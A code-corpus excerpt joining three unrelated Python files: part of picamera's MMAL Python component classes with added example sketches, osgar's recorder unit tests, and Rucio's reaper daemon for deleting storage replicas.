completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
        if isinstance(source, (MMALPort, MMALPythonPort)):
            return self.inputs[0].connect(source, **options)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
        Overridden to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
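# Editor's note: a minimal sketch (not part of the original module) of the
# subclassing pattern described above for MMALPythonComponent: declare the input
# formats the component accepts, override _handle_frame, pull a buffer from each
# output, copy the input frame into it and send it on. The class name and the
# format choices are illustrative only.
class _ExamplePassthroughComponent(MMALPythonComponent):
    """
    Forwards every frame received on the input port to all output ports
    without modification.
    """
    def __init__(self):
        super(_ExamplePassthroughComponent, self).__init__(
            name='py.passthrough', outputs=1)
        self.inputs[0].supported_formats = {
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_RGB24,
            }

    def _handle_frame(self, port, buf):
        # Copy the incoming frame into a fresh buffer on every output port
        for output in self.outputs:
            out_buf = output.get_buffer()
            out_buf.copy_from(buf)
            output.send_buffer(out_buf)
        # More frames are expected, so keep processing
        return False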
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
        connections between Python and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
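# Editor's note: a hedged end-to-end sketch (not part of the original module)
# wiring the pure-Python components together: raw I420 frames are read from a
# file by MMALPythonSource and written back out by MMALPythonTarget. The file
# names and frame size are illustrative, and the format/framesize assignments
# assume MMALPythonPort exposes the same configuration properties as the real
# MMAL ports; treat this as a sketch rather than tested pipeline code.
def _example_python_pipeline(infile='frames.i420', outfile='copy.i420'):
    source = MMALPythonSource(infile)
    target = MMALPythonTarget(outfile)
    source.outputs[0].format = mmal.MMAL_ENCODING_I420   # assumed setter
    source.outputs[0].framesize = (640, 480)             # assumed setter
    source.outputs[0].commit()
    target.connect(source)          # builds an MMALPythonConnection
    target.connection.enable()      # enables the ports at both ends
    target.enable()
    source.enable()
    try:
        source.wait()               # returns once the input is exhausted (EOS sent)
        target.wait(timeout=5)      # True once the EOS flag reaches the target
    finally:
        source.disable()
        target.disconnect()
        target.close()
        source.close()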
|
test_record.py
|
import unittest
from unittest.mock import patch, MagicMock
from datetime import timedelta
import json
import os
import threading
import signal
import subprocess
import tempfile
import sys
from osgar.record import Recorder
class Sleeper:
def __init__(self, cfg, bus):
self.e = threading.Event()
def start(self):
self.t = threading.Thread(target=self.e.wait, args=(5,))
self.t.start()
def join(self, timeout=None):
self.t.join(timeout)
def request_stop(self):
self.e.set()
class RecorderTest(unittest.TestCase):
def test_dummy_usage(self):
empty_config = {'modules': {}, 'links':[]}
with Recorder(config=empty_config, logger=MagicMock()) as recorder:
pass
def test_missing_init(self):
# init section for modules is now optional
mini_config = {'modules': {
"dummy": {
"driver": "osgar.test_record:Sleeper"
},
}, 'links':[]}
with Recorder(config=mini_config, logger=MagicMock()) as recorder:
pass
def test_config(self):
with patch('osgar.drivers.logserial.serial.Serial') as mock:
instance = mock.return_value
instance.read = MagicMock(return_value=b'$GNGGA,182433.10,5007.71882,N,01422.50467,E,1,05,6.09,305.1,M,44.3,M,,*41')
config = {
'modules': {
'gps': {
'driver': 'gps',
'out':['position'],
'init':{}
},
'serial_gps': {
'driver': 'serial',
'out':['raw'],
'init': {'port': 'COM51', 'speed': 4800}
}
},
'links': [('serial_gps.raw', 'gps.raw')]
}
logger = MagicMock(write = MagicMock(return_value=timedelta(seconds=135)))
with Recorder(config=config, logger=logger) as recorder:
self.assertEqual(len(recorder.modules), 2)
self.assertEqual(sum([sum([len(q) for q in module.bus.out.values()])
for module in recorder.modules.values()]), 1)
def test_spider_config(self):
# first example with loop spider <-> serial
with open(os.path.dirname(__file__) + '/../config/test-spider.json') as f:
config = json.loads(f.read())
with patch('osgar.drivers.logserial.serial.Serial') as mock:
logger = MagicMock()
recorder = Recorder(config=config['robot'], logger=logger)
def test_all_supported_config_files(self):
supported = ['test-spider.json', 'test-gps-imu.json',
'test-spider-gps-imu.json', 'test-windows-gps.json']
with patch('osgar.drivers.logserial.serial.Serial') as mock:
logger = MagicMock()
for filename in supported:
with open(os.path.join(os.path.dirname(__file__), '..', 'config',
filename)) as f:
config = json.loads(f.read())
recorder = Recorder(config=config['robot'], logger=logger)
@unittest.skipIf(os.name != "posix", "requires posix shell")
def test_sigint_shell(self):
config = {
'version': 2,
'robot': {
'modules': {
"app": {
"driver": "osgar.test_record:Sleeper",
"init": {}
},
}, 'links':[]
}
}
with tempfile.NamedTemporaryFile() as cfg:
cfg.write(json.dumps(config).encode('ascii'))
cfg.flush()
env = os.environ.copy()
env['OSGAR_LOGS'] = '.'
with subprocess.Popen(
f"echo starting; {sys.executable} -m osgar.record {cfg.name}; echo should not get here",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
start_new_session=True,
env=env,
) as proc:
grp_id = os.getpgid(proc.pid)
self.assertEqual(proc.stdout.readline().strip(), b"starting")
log_line = proc.stderr.readline().strip().split()
log_filename = log_line[-1]
self.assertTrue(log_filename.endswith(b".log"), log_line)
self.assertIn(b"SIGINT handler installed", proc.stderr.readline())
os.killpg(grp_id, signal.SIGINT)
stdout, stderr = proc.communicate()
self.assertIn(b"committing suicide by SIGINT", stderr)
self.assertEqual(len(stdout), 0, stdout)
self.assertEqual(len(stderr.splitlines()), 1, stderr)
os.unlink(log_filename)
# vim: expandtab sw=4 ts=4
|
reaper.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2013-2015
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2014
# - Wen Guan, <wen.guan@cern.ch>, 2014-2016
# - Thomas Beermann <thomas.beermann@cern.ch>, 2016
'''
Reaper is a daemon to manage file deletion.
'''
import datetime
import hashlib
import logging
import math
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.db.sqla.constants import ReplicaState
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, ServiceUnavailable, RSEAccessDenied,
ReplicaUnAvailable, ResourceTemporaryUnavailable,
DatabaseException, UnsupportedOperation,
ReplicaNotFound, RSENotFound)
from rucio.common.utils import chunks
from rucio.core import monitor
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.replica import list_unlocked_replicas, update_replicas_states, delete_replicas
from rucio.core.rse import sort_rses
from rucio.core.rse_expression_parser import parse_expression
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging, config_get('common', 'loglevel').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def __check_rse_usage(rse, rse_id):
"""
Internal method to check RSE usage and limits.
    :param rse: the rse name.
    :param rse_id: the rse id.
:returns : max_being_deleted_files, needed_free_space, used, free.
"""
max_being_deleted_files, needed_free_space, used, free = None, None, None, None
# Get RSE limits
limits = rse_core.get_rse_limits(rse=rse, rse_id=rse_id)
if not limits and 'MinFreeSpace' not in limits and 'MaxBeingDeletedFiles' not in limits:
return max_being_deleted_files, needed_free_space, used, free
min_free_space = limits.get('MinFreeSpace')
max_being_deleted_files = limits.get('MaxBeingDeletedFiles')
# Get total space available
usage = rse_core.get_rse_usage(rse=rse, rse_id=rse_id, source='srm')
if not usage:
return max_being_deleted_files, needed_free_space, used, free
for var in usage:
total, used = var['total'], var['used']
break
free = total - used
if min_free_space:
needed_free_space = min_free_space - free
return max_being_deleted_files, needed_free_space, used, free
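# Editor's note: a small illustrative check (not part of the original daemon) of the
# arithmetic performed above, using made-up numbers: with MinFreeSpace = 200 TB and
# an SRM usage report of total = 1000 TB, used = 850 TB, free is 150 TB and the
# reaper therefore needs to clear 50 TB on that RSE.
def _example_free_space_arithmetic():
    terabyte = 10 ** 12
    min_free_space = 200 * terabyte
    total, used = 1000 * terabyte, 850 * terabyte
    free = total - used
    needed_free_space = min_free_space - free
    assert needed_free_space == 50 * terabyte
    return needed_free_space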
def reaper(rses, worker_number=1, child_number=1, total_children=1, chunk_size=100, once=False, greedy=False, scheme=None, delay_seconds=0):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param child_number: The child number.
:param total_children: The total number of children created per worker.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
"""
logging.info('Starting Reaper: Worker %(worker_number)s, child %(child_number)s will work on RSEs: ' % locals() + ', '.join([rse['rse'] for rse in rses]))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
# Generate a hash just for the subset of RSEs
rse_names = [rse['rse'] for rse in rses]
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rse_names)).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
checkpoint_time = datetime.datetime.now()
logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
max_deleting_rate, nothing_to_do = 0, True
for rse in sort_rses(rses):
try:
if checkpoint_time + datetime.timedelta(minutes=1) < datetime.datetime.now():
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
checkpoint_time = datetime.datetime.now()
rse_info = rsemgr.get_rse_info(rse['rse'])
rse_protocol = rse_core.get_rse_protocols(rse['rse'])
if not rse_protocol['availability_delete']:
logging.info('Reaper %s-%s: RSE %s is not available for deletion', worker_number, child_number, rse_info['rse'])
continue
# Temporary hack to force gfal for deletion
for protocol in rse_info['protocols']:
if protocol['impl'] == 'rucio.rse.protocols.srm.Default' or protocol['impl'] == 'rucio.rse.protocols.gsiftp.Default':
protocol['impl'] = 'rucio.rse.protocols.gfal.Default'
if protocol['impl'] == 'rucio.rse.protocols.signeds3.Default':
protocol['impl'] = 'rucio.rse.protocols.s3es.Default'
logging.info('Reaper %s-%s: Running on RSE %s', worker_number, child_number, rse_info['rse'])
needed_free_space, max_being_deleted_files = None, 100
needed_free_space_per_child = None
if not greedy:
max_being_deleted_files, needed_free_space, used, free = __check_rse_usage(rse=rse['rse'], rse_id=rse['id'])
logging.info('Reaper %(worker_number)s-%(child_number)s: Space usage for RSE %(rse)s - max_being_deleted_files: %(max_being_deleted_files)s, needed_free_space: %(needed_free_space)s, used: %(used)s, free: %(free)s' % locals())
if needed_free_space <= 0:
needed_free_space, needed_free_space_per_child = 0, 0
logging.info('Reaper %s-%s: free space is above minimum limit for %s', worker_number, child_number, rse['rse'])
else:
if total_children and total_children > 0:
needed_free_space_per_child = needed_free_space / float(total_children)
start = time.time()
with monitor.record_timer_block('reaper.list_unlocked_replicas'):
replicas = list_unlocked_replicas(rse=rse['rse'], rse_id=rse['id'],
bytes=needed_free_space_per_child,
limit=max_being_deleted_files,
worker_number=child_number,
total_workers=total_children,
delay_seconds=delay_seconds)
logging.debug('Reaper %s-%s: list_unlocked_replicas on %s for %s bytes in %s seconds: %s replicas', worker_number, child_number, rse['rse'], needed_free_space_per_child, time.time() - start, len(replicas))
if not replicas:
logging.info('Reaper %s-%s: nothing to do for %s', worker_number, child_number, rse['rse'])
continue
nothing_to_do = False
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
for files in chunks(replicas, chunk_size):
logging.debug('Reaper %s-%s: Running on : %s', worker_number, child_number, str(files))
try:
update_replicas_states(replicas=[dict(replica.items() + [('state', ReplicaState.BEING_DELETED), ('rse_id', rse['id'])]) for replica in files], nowait=True)
for replica in files:
try:
replica['pfn'] = str(rsemgr.lfns2pfns(rse_settings=rse_info,
lfns=[{'scope': replica['scope'], 'name': replica['name'], 'path': replica['path']}],
operation='delete', scheme=scheme).values()[0])
except (ReplicaUnAvailable, ReplicaNotFound) as error:
err_msg = 'Failed to get pfn UNAVAILABLE replica %s:%s on %s with error %s' % (replica['scope'], replica['name'], rse['rse'], str(error))
logging.warning('Reaper %s-%s: %s', worker_number, child_number, err_msg)
replica['pfn'] = None
add_message('deletion-planned', {'scope': replica['scope'],
'name': replica['name'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'rse': rse_info['rse']})
monitor.record_counter(counters='reaper.deletion.being_deleted', delta=len(files))
try:
deleted_files = []
prot.connect()
for replica in files:
try:
logging.info('Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
start = time.time()
if rse['staging_area'] or rse['rse'].endswith("STAGING"):
logging.warning('Reaper %s-%s: Deletion STAGING of %s:%s as %s on %s, will only delete the catalog and not do physical deletion',
worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
else:
if replica['pfn']:
prot.delete(replica['pfn'])
else:
logging.warning('Reaper %s-%s: Deletion UNAVAILABLE of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
monitor.record_timer('daemons.reaper.delete.%s.%s' % (prot.attributes['scheme'], rse['rse']), (time.time() - start) * 1000)
duration = time.time() - start
deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
add_message('deletion-done', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'duration': duration})
logging.info('Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], duration)
except SourceNotFound:
err_msg = 'Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
logging.warning(err_msg)
deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
if replica['state'] == ReplicaState.AVAILABLE:
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(err_msg)})
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error)})
except Exception as error:
logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error)})
except:
logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
for replica in files:
logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error)})
finally:
prot.close()
start = time.time()
with monitor.record_timer_block('reaper.delete_replicas'):
delete_replicas(rse=rse['rse'], files=deleted_files)
logging.debug('Reaper %s-%s: delete_replicas successes %s %s %s', worker_number, child_number, rse['rse'], len(deleted_files), time.time() - start)
monitor.record_counter(counters='reaper.deletion.done', delta=len(deleted_files))
except DatabaseException as error:
logging.warning('Reaper %s-%s: DatabaseException %s', worker_number, child_number, str(error))
except UnsupportedOperation as error:
logging.warning('Reaper %s-%s: UnsupportedOperation %s', worker_number, child_number, str(error))
except:
logging.critical(traceback.format_exc())
except RSENotFound as error:
logging.warning('Reaper %s-%s: RSE not found %s', worker_number, child_number, str(error))
except:
logging.critical(traceback.format_exc())
if once:
break
if nothing_to_do:
logging.info('Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, child_number)
time.sleep(60)
        except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
